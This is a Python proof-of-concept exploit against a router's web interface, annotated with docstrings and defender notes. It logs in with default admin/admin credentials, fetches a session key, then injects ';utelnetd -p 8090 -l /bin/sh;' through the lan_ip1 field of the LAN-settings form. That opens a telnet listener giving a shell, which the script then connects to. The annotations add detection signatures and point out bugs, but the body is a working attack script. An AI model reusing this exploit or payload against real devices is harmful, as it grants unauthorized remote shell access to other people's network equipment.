import
requests
import
os
from
time
import
sleep
# Module-level constants shared by every function below. Everything is
# hard-coded to one address; nothing on this page reads a target from the
# command line or the environment.
server = "192.168.1.1"
# Plain http:// on port 80 — no TLS is involved in any request this script
# makes, so the ``s.verify = False`` lines in the functions below have no
# effect here.
main_url = "http://192.168.1.1:80"
# Browser-like User-Agent sent on every request. On its own it is not a useful
# indicator of this script; the request paths and bodies below are.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
}
def login():
    """Request the device login page with default credentials and print the reply.

    Sends one GET to ``/cgi-bin/Login.asp`` with ``User=admin&Pwd=admin`` in
    the query string (plus a numeric ``_`` parameter that looks like a
    cache-buster — unverified) and prints the response body. Nothing is
    returned and the ``Session`` is discarded, so any cookie the device sets
    here is not carried into ``get_session_key()`` or ``poc()``; whether those
    later requests actually need it cannot be told from this page.

    Defender notes:
    - The credentials travel in the URL over plain HTTP, so they appear
      verbatim in proxy/web-server access logs and on the wire.
    - A GET to ``/cgi-bin/Login.asp`` whose query string carries
      ``User=admin&Pwd=admin`` is a concrete log indicator for this script
      (and, more generally, for default-credential use on this interface).
    """
    s = requests.Session()
    # No effect for the http:// URL used here; only matters for TLS connections.
    s.verify = False
    url = main_url + "/cgi-bin/Login.asp?User=admin&Pwd=admin&_=1691919162829"
    resp = s.get(url, headers=headers, timeout=100)
    print(resp.text)
def get_session_key():
    """Fetch the value ``poc()`` later submits as the ``sessionKey`` form field.

    Sends one GET to ``/cgi-bin/get/New_GUI/get_sessionKey.asp`` on a fresh
    ``Session`` (no cookie from ``login()`` is carried over), prints the raw
    response body and returns it unchanged.

    Returns:
        str: the full response body. No parsing, trimming or validation is
        done, so an error page would be returned just as readily as a key.

    Defender note: the request carries no cookie or credential at all;
    whether the device requires a prior login for this endpoint cannot be
    determined from this script alone. A GET to this path from a non-browser
    client is a second concrete indicator for the activity on this page.
    """
    s = requests.Session()
    # No effect for the http:// URL used here; only matters for TLS connections.
    s.verify = False
    url = main_url + "/cgi-bin/get/New_GUI/get_sessionKey.asp"
    resp = s.get(url, headers=headers, timeout=100)
    # The whole body is treated as the key — nothing checks that it is one.
    sessionKey = resp.text
    print(sessionKey)
    return sessionKey
def poc(sessionKey=None):
    """Submit the LAN-settings form with a shell fragment injected into ``lan_ip1``.

    Builds a URL-encoded body for ``/cgi-bin/New_GUI/Set/Network.asp`` that is
    an otherwise ordinary LAN configuration submission, except that the
    ``lan_ip1`` value is followed by ``cmd`` and the body ends with the
    ``sessionKey`` obtained from ``get_session_key()``. The POST's return
    value is discarded.

    Args:
        sessionKey: the string returned by ``get_session_key()``. The default
            ``None`` is not usable — ``None`` has no ``.encode`` — so calling
            ``poc()`` without an argument raises ``AttributeError`` before any
            request is sent.

    Defender notes:
    - The injection point is the ``lan_ip1`` form field. A ``;`` (or any
      non-dotted-quad character) in an IP-address field is never legitimate
      input, so strict server-side validation of that field — rejecting
      anything that is not a dotted quad — closes this path; presumably the
      device passes the value to a shell unescaped, though that cannot be
      confirmed from this page.
    - A POST to ``/cgi-bin/New_GUI/Set/Network.asp`` whose body contains a
      ``;`` inside ``lan_ip1=`` is a precise detection signature; the
      ``utelnetd -p 8090`` fragment is a second one, as is a new listener on
      TCP 8090 on the device afterwards.
    - The 10000-second timeout (100 elsewhere) is not explained on the page.
    - ``resp`` is never bound in this function, so the final ``print`` raises
      ``NameError`` — but only after the POST has already been sent. A
      traceback from this line does not mean the request never went out.
    """
    s = requests.Session()
    # No effect for the http:// URL used here; only matters for TLS connections.
    s.verify = False
    # Command-injection payload appended to the lan_ip1 value.
    cmd = b";utelnetd -p 8090 -l /bin/sh;"
    post_data = b"lan_ip1=192.168.1.1"
    post_data += cmd
    # Remaining fields mirror a normal LAN-settings submission; none of them
    # is modified by the injection.
    post_data += b"&lan_netmask1=255.255.255.0&lan2_enable=No"
    post_data += b"&lan_ip2=192.168.2.1&lan_netmask2=255.255.255.0"
    post_data += b"&lan_dhcp_type=1&lan_dhcp_start=192.168.1.2&lan_dhcp_count=253&lan_dhcp_lease=86400"
    post_data += b"&lan_dhcp_option60_vendorID=&lan_dhcp_pridns=&lan_dhcp_secdns=&lan_dhcp_relay_server=&upnp_active=Yes"
    post_data += b"&lan2_active=No&sessionKey="
    # Raises AttributeError when sessionKey is None (the default).
    post_data += sessionKey.encode(encoding="utf-8")
    url = main_url + "/cgi-bin/New_GUI/Set/Network.asp"
    # Response object is discarded here.
    s.post(url, data=post_data, headers=headers, timeout=10000)
    # NameError: ``resp`` is not defined in this scope (see docstring).
    print(resp.text)
if __name__ == '__main__':
    # Driver: log in with default credentials, fetch the session key, submit
    # the injected form, then hand the terminal to the system telnet client.
    # All of it targets the hard-coded ``main_url``/``server`` constants.
    print("\n[*] Connection ", main_url)
    login()
    print("[*] Getting session key")
    sessionKey = get_session_key()
    print("[*] Sending payload")
    poc(sessionKey=sessionKey)
    # Only reached if poc() returns normally; as written, poc() raises
    # NameError on its last line after the POST has been sent.
    print("[*] Running Telnetd Service")
    print("[*] Opening Telnet Connection\n")
    # Fixed 3-second wait before connecting; no check that a listener is up.
    sleep(3)
    # Shell string built from the constant ``server`` (not from user input);
    # the interactive telnet client owns the terminal from here on.
    os.system('telnet ' + str(server) + ' 8090')